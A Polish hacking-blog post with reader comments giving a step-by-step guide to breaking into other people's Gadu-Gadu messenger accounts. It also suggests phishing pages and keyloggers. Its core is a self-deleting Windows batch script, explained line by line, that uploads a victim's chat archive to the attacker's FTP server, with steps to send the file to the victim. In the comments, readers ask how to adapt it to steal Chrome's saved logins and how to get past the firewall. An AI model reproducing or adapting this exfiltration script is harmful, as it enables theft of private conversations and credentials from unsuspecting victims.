Jak włamać się na gg?

Jeśli chciałbyś odzyskać z któregoś komputera archiwum gg, liste kontaktów bądź zalogować się do numeru gadu-gadu to ten wpis jest przeznaczony właśnie dla Ciebie. Coraz więcej osób zadaje mi pytanie jak włamać się na gadu-gadu. Odpowiedź nie jest trywialna bo sposobów na włam jest wiele. Metoda nie obejmuje gg w telefonie :). Pierwszą metodą włamania dla przyszłych hakerów, którą zaproponuje do wykonania sobie samemu to próba stworzenia strony phishingowej (http://www.gg.pl/) zupełnie tak jak w naszym poprzednim wpisie jak włamać się na fb, możesz spróbować tylko do celów edukacyjnych! 🙂

Jak włamać się na gg?

Do wpisu niedługo pojawi się również filmy które tak lubicie. Dodatkowo powiem Tobie,  jeżeli interesują Cię tematy hakerstwa to polecam również:

Sposób nr 1: 

Dawno temu powstała świetna, dosyć innowacyjna wtedy aplikacja o nazwie Złodziej GG v.2.0choć program już nie działa (być może działa, lecz był dedykowane do wykradania archiwum, kontaktów i konfiguracji z Gadu-Gadu w wersji 7.6 pod Windows XP) to warty jest uwagi ze sposobu działania. Zrzut ekranu z programu jest pokazany na początku wpisu. Dlaczego o nim wspominam? Dzisiejszy sposób włamania na gadu-gadu będzie opierał się na tym pomyśle.

Jak wykradanie archiwum działało?

Program Złodziej gg za pomocą ścieżki do plików w X:\Documents and Settings\XXX\Gadu-Gadu (w Windows XP):

  • config.dat – hasło, numer i cała konfiguracja tutaj się znajdowała
  • archives.dat – plik ten przechowuje wszystkie rozmowy zachowane w archiwum
  • smseab.dat – przechowuje listę kontaktów

Pomysł polegał na spakowaniu i wysłaniu tych plików na podany podczas konfiguracji adres e-mail.

Sposób nr 2:

Kolejnym sposobem na włamanie się komuś na gg jest wykorzystanie programu typu Keylogger. Sposób jest analogiczny do opisanego w wpisie rózne metody hakowania konta Facebook. Program tego typu, wysłany ofierze ma za zadanie zapisywanie każdego wciśniętego klawisza na komputerze a następnie zebrane dane zostają przesłane do cyberprzestępcy – hakera. Należy mieć na uwadze że tego typu oprogramowanie po jakimś czasie jest wykrywalne przez antywirusy.

Sposób nr 3:

Jeśli jakimś cudem znamy hasło do numeru gg i chcielibyśmy poczytać archiwum ofiary, warto zajrzeć na stronę http://www.gg.pl/  a następnie obejrzeć sobie przebieg rozmów, archiwizacja w chmurze online domyślnie w nowszych wersja GG jest włączona. Osobiście polecam wyłączyć tę opcje u siebie logując się na gg.pl -> ustawienia ->moje konto -> ustawienia prywatności -> Archiwizuj wiadomości przesunąć suwak na wyłączone.

jak włamać się na gg - zabezpieczenie archiwum
Opcja wyłączenia archiwizacji naszych rozmów w chmurze gg.pl…

Jak włamać się komuś na gg w praktyce?

Co będziemy potrzebowali do włamania na gadu:

Zaczynamy (ścieżka w tym przykładzie jest przetestowana dla Gadu-Gadu w wersji 10.5.2.13164)!

  1. Za pomocą swojego ulubionego edytora tworzymy nowy plik tekstowy (polecam Notepad++)
  2. Wklejamy poniższy kod do niego:
    @echo off
    
    REM haker.edu.pl---------------------------------
    set login_ftp=LOGIN_FTP
    set haslo_ftp=HASLO_FTP
    set serwer_ftp=SERWER_FTP
    set gg_10_archiwum=%userprofile%\AppData\Roaming\Gadu-Gadu 10\NUMER_GG\Archive.db
    REM ---------------------------------------------
    
    echo %login_ftp%> gg.txt
    echo %haslo_ftp%>> gg.txt
    echo put "%gg_10_archiwum%">> gg.txt
    echo close >> gg.txt
    echo bye >> gg.txt
    
    ftp.exe -s:gg.txt %serwer_ftp%
    
    del gg.txt
    del %0 
    exit
  3. Modyfikujemy trzy parametry: LOGIN_FTP, HASLO_FTP, SERWER_FTP, NUMER_GG (oczywiście ofiary).
  4. Testujemy – warto najpierw przetestować konfiguracje zanim wyślemy to ofierze.
  5. Wysyłamy plik ofierze.
  6. Czekamy aż uruchomi i sprawdzamy czy plik już pojawił się na ftp…
  7. Jeśli posiadamy już plik wystarczy utworzyć nowe konto gadu-gadu i podmienić plik z naszego gg na plik wykradziony z ftp Archive.db.
  8. Uruchamiamy gadu-gadu i… okazuje się że mamy archiwum ofiary. Jeśli chcielibyśmy listę kontaktów, profil konfiguracyjny itd… wystarczy samemu się rozejrzeć po folderze C:\Users\NAZWA_UZYTKOWNIKA_KOMPUTERA\AppData\Roaming\Gadu-Gadu 10\NUMER_GG\ i dopisać odpowiednie linijki zaraz za 12 linią w naszym skrypcie. (jeżeli folder taki nie istnieje to musisz włączyć pokazywanie ukrytych plików)
  9. Gotowe! Teraz już wiesz jak włamać się na gg.


Uwaga! Warto używać darmowego do jednorazowego użytku serwera FTP ponieważ plik wsadowy .BAT można edytować i podglądać nawet notatnikiem!

Należy pamiętać że różne wersje gg używają różnych nazw plików i ścieżek, system Windows XP posiada plik archiwum w C:\Program Files\Gadu-Gadu\users\NUMER_GG\Archives.dat. 

Opcjonalne parametru aplikacji ftp.exe

Dla ciekawskich program ftp.exe posiada również inne parametry oprócz -s:

C:\Users\Patryk>ftp.exe /?

Przesyła pliki do i z komputera, na którym jest uruchomiona usługa serwera FTP
(niekiedy nosi nazwę demon). FTP może być używane interakcyjnie.

FTP [-v] [-d] [-i] [-g] [-s:nazwa_pliku] [-a] [-A] [-x:bufor_wysyłany]
[-r:bufor_odbierany] [-b:bufory_asynchroniczne] [-w:rozmiar_okna] [host]

-v Eliminuje wyświetlanie odpowiedzi zdalnego serwera.
-n Eliminuje automatyczne logowanie przy początkowym
połączeniu.
-i Wyłącza interakcyjne komunikaty podczas przesyłania
wielu plików.
-d Włącza debugowanie.
-g Wyłącza globbing nazwy pliku (zob. polecenie GLOB).
-s:nazwa_pliku Określa plik tekstowy zawierający polecenia FTP; polecenia
zostaną automatyczne wywołane po otwarciu sesji FTP.
-a Użyj dowolnego lokalnego interfejsu podczas nawiązywania
połączenia.
-A Zaloguj się jako użytkownik anonimowy.
-x:bufor wysyłany Zastępuje domyślny rozmiar (8192) SO_SNDBUF.
-r:bufor odbierany Zastępuje domyślny rozmiar (8192) SO_RCVBUF.
-b:licznik asynch Zastępuje domyślny licznik asynchroniczny (3).
-w:rozmiar_okna Zastępuje domyślny rozmiar (65535) buforu transmisji.
host Określa nazwę hosta lub adres IP zdalnego hosta, z którym
jest nawiązywane połączenie.

PS:
– polecenia mget i mput przyjmują y/n/q jako tak/nie/zakończ (yes/no/quit).
– Aby anulować polecenie, naciśnij klawisze Ctrl+C.

C:\Users\HakerEduPL>

Skrypt pod roboczym tytułem „jak włamać się do Gadu-Gadu” – objaśnienie

Jeżeli chcesz dogłębnie zrozumieć działanie skryptu, polecam zapoznać się z jakimś kursem programowania w batch/plikach wsadowych lub z tym opisem od Microsoftu poleceń. Poniżej linia po linii objaśniam kod:

Linia 1: określa czy wyświetlać informacje wpisywane na ekranie (konsoli), my wyłączamy

Linia 4: tak ustawia się zmienne w plikach wsadowych, wpisujemy tu login do naszego serwera ftp

Linia 5: zmienna, wpisujemy tu hasło do naszego ftp

Linia 6: adres naszego serwera ftp

Linia 7: jedna z najważniejszych, jest to ścieżka do pliku archiwum, który chcemy wykraść. Należy uzupełnić tutaj numer gg (oczywiście można się pokusić samemu o zaprogramowanie wyszukiwania wszystkich folderów numerów gg). Użyliśmy tutaj również zmiennej środowiskowej %userprofile%, w tym miejscu automatycznie przypisuje się ścieżka do folderu użytkownika np. C:\Users\HakerEduPL

Linia 10-12: używamy wcześniej zdefiniowanych zmiennych i zapisujemy je do pliku gg.txt który wykorzystujemy w kolejnym poleceniu. Ważne ejst to aby nie było spacji z lewej strony pomiędzy strzałeczkami „>” i „>>”. Jeśli by były login, hasło i serwer na końcu by miały spacje i logowanie by się nie powiodło. Czym się różni pojedyncza „strzałeczka” (przekierowanie strumienia) od podwójnej? Pojedyncza strzałeczka „>” – jeżeli istnieje już plik o nazwie gg.txt, to go nadpisze (usunie i stworzy nowy), podwójna dopisuje tekst na końcu pliku jeżeli już istnieje, jeżeli nie istnieje tworzy go i też dopisuje 🙂

Linia 13: rozłącza się z serwerem ftp

Linia 14: wychodzi z programu ftp.exe

Linia 16: uruchamia program konsolowy ftp.exe, pierwszy parametr -s: nakazuje wczytać polecenia z nowo utworzonego pliku gg.txt i je wykonać, kolejny parametr to zmienna w miejsce której wstawiany jest adres do naszego serwera ftp.

Linia 18: usuwa plik gg.txt

Linia 19: usuwa nasz skrypt (plik.bat), zmienna %0 oznacza automatyczne wstawianie pliku.

Linia 20: zamyka konsole

Zakończenie

Teraz to już naprawde koniec tego poradnika jak włamać się na gg, teraz już wiesz „jak odzyskać hasło do gg
” :). Jeżeli dotrwałeś dotąd i interesują Cię sztuczki wykorzystujące ftp.exe polecam inne wpisy:

Pozdrawiamy! 🙂

37 thoughts to “Jak włamać się na gg?”

    1. Dziękuje, szkoda że ten wpis kilkanaście dni czekał na publikacje jak i inne… które sposoby przestały już działać niestety (nie chodzi o gg)…

      Pozdrawiam!

    1. Dziękuje. Warto zaznaczyć że tak można każdy plik wykraść. Można również te polecenia zaimplementować w C++ (polecenie system()). Bo coś tam kiedyś skrobałeś chyba sobie w C++ 🙂

      Niedługo dodam również film z komentarzem kodu i prezentacją działania (BRAK SIŁ :D), ogólnie aby obsługiwał wszystkie wersje GG da się to zrobić, ale trzeba pościągać i pooglądać ścieżki i pobadać które to archiwum itd i skrypt rozbudować pokaźnie :). Ja pisałem pod gg 10.5.

      Pozdrawiam.

    1. Będzie, ale na razie zajmuje się najczęstszymi pytaniami z for.

      Tablice są skuteczne, ale zajmują np: 30GB/100GB (im większa tym lepsza) na dysku i wykorzystuje je się tylko i wyłącznie jeśli wykradliśmy z jakiejś bazy danych np: forum, hasło zaszyfrowane (utworzony skrót) np. za pomocą MD5: 91162629d258a876ee994e9233b2ad87 – oznacza „ala ma kota”. Tablica tęczowa to zbiór tego typu:

      hasło_zaszyfrowane_auudasjads1 | haslo_prawdziwe1
      hasło_zaszyfrowane_xsdffdfdfd2 | haslo_prawdziwe2
      hasło_zaszyfrowane_erfefsfdfd3 | haslo_prawdziwe3
      hasło_zaszyfrowane_csadsdasdj4 | haslo_prawdziwe4

      Jeśli chcemy złamać np: 91162629d258a876ee994e9233b2ad87, to podajemy programowi ten MD5, następnie program do obsługi tablic tęczowych wyszukuje czy znajduje się takie zaszyfrowane hasło w słowniku, jeśli tak to podaje hasło_prawdziwe :).

      W standardowej metodzie ataku słownikowego, za każdym razem gdy pobieramy z danej linijki hasło prawdziwe to musimy je zaszyfrować następnie porównać czy dane hasło zaszyfrowane=91162629d258a876ee994e9233b2ad87 jeśli tak to wypisz hasło.

      Tablice tęczowe oszczędzają procesor (moc obliczeniową), bo jest gotowym zbiorem danych „hasło_potencjalne |zaszyfrowane” i wystarczy w tej bazie zaszyfrowanych haseł wyszukać, czy jest taki już skrót np. MD5 91162629d258a876ee994e9233b2ad87 a nie szyfrować za każdym razem i sprawdzać.

      Więc tylko wykradzione dane zaszyfrowane nim złamiemy.

  1. Witam, nie wiem czemu ale niestety u mnie nie działa plik .bat stworzony krok po kroku według tego tutoriala.
    Mam konto na cba.pl, a kod w bat ma wyglądać tak:

    set login_ftp=LOGIN_FTP np. admin@nazwa.cba.pl
    set haslo_ftp=HASLO_FTP np. hasło_do_konta
    set serwer_ftp=SERWER_FTP np. cba.pl
    set gg_10_archiwum=%userprofile%AppDataRoamingGadu-Gadu 10NUMER_GG(tu wpisywałem numer)Archive.db

    tak powinno być a mimo to nie działa. Może mi jakoś pomożecie.

    1. Spróbuj utworzyć plik na dysku swoim C:przyklad.txt

      i zmień w skrypcie na:

      set gg_10_archiwum=C:przyklad.txt

      Wtedy dowiesz się czy coś wysyła wgl (czy połączenie z serwerem dobre).

  2. Witam. Mógłbyś mi to wytłumaczyć bardziej na gg ? bo robię wszystko i mi nie działa albo filmik z tym wrzucić (moje gg 7$&%$^&) 😉

  3. A co jeśli po uruchomieniu wyskakuje mi napis, że Wersja tego pliku jest niezgodna z wersją użytkowanego systemu Windows ?

    1. Ciężko powiedzieć, mi działa na domyślnych ustawieniach w XP, Windows 7, Windows Vista, Windows 8.1. Dziwne żeby plik wsadowy .bat nie działał. Google.

  4. Fajny poradnik 🙂 Wysyła plik na serwer, ale dopiero po odblokowaniu tego bat’a w zaporze systemowej. Dało by radę jakoś to obejść? Wysyłałem inny plik, nie archiwum, bo nie mam gg. set gg_10_archiwum=%userprofile%AppDataRoamingAIMP3AIMP3.bak – jak widzimy przykładowy plik, nic specjalnego. Ale gdy go ściągam na dysk jest on inny niż oryginalny. Czemu? Wygląda jakby kodowanie się zmieniło.

    1. U mnie od Windows XP do Windows 8 nie wymagał dodania wyjątku do zapory systemowej, nawet nie pytał. Jak dajesz edytuj na AIMP3.bak w środku to jest inny? Przed wysłaniem pliku wykonywalnego możesz wpisać tryb transmisji:
      ascii, asc ustanowienie tekstowego trybu transmisji
      binary, bin ustanowienie binarnego trybu transmisji

  5. Witajcie, wybaczcie pytania laika…
    Pierwsze jest takie, że nie bardzo rozumiem trzecią linijkę kodu. Co mam wpisać zamiast „haker.edu.pl”?
    Drugie dotyczy wysłania – czy „ofiara” jak np. dostanie ten plik mailem musi go zapisać na dysku? No i będzie miała do niego wgląd, więc się połapie. Proszę o wyjaśniennie 🙂

    1. Wystarczy wpisać w google co znaczy REM, nie napisaliśmy nic o modyfikacji 3 linijki. Proszę czytać uważnie. Jeżeli Twoje ofiary edytują każdy plik to może się połapać. Chyba że znajdziesz konwerter lub napiszesz „bat to exe”.

      Pozdrawiamy

  6. Jak bedzie wygladal kod, gdzie program ma wysłać plik: %userprofile%AppDataLocalGoogleChromeUser DataDefaultLogin Data

    Na ftp. Głowkuje juz 2 godzine i nic 🙁

  7. Nie rozumiem. Do Notepada wkleiłem kod, zmieniłem co należało zmienić i po prostu zapisałem. Jest to plik tekstowy. Mam to wysłać na maila czy przez GG ofierze? I ofiara musi to otwierać, czy wystarczy, że będzie u niej na komputerze?

  8. Czy byłaby możliwość stworzenia filmu na youtube lub gdziekolwiek do pobrania jak to zrobić? Nie wątpię w to, że jest wszystko dobre opracowane ale jestem laikiem i filmik pomógłby mi zrozumieć i wykonać to działanie. Haker ze mnie jak z Tuska premier-żaden. Kij mnie obchodzi archiwum danej osoby. Pragnę napisać do kogoś z jej listy kontaktów żeby dowiedzieć się czy ta osoba żyje. GG nie odpowiada i komórka też…

    1. Myślę że nie ma sensu, my nie zachęcamy do włamywania się tylko prowadzimy bloga pokazując pewne problemy. Film jest zbędny w tym wpisie.

  9. Witam. Bardzo ciekawy poradnik, sama bardzo chciałabym nauczyć się czegoś, i ogólnie bardzo proszę o pomoc. Czy znalazł by się ktoś kto po prostu, byłby zdecydowany popróbować swoich możliwości na konkretnym numerze gg? Bardzo mi zależy, szukam już dniami i nocami i nic.. albo szukam po prostu dobrego znawcy, który mi w tym pomoże. Znajdzie się taki haker? Z góry bardzo dziekuje za jakiekolwiek próby pomocy. Sama jestem w tym temacie nieobeznana wcale.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *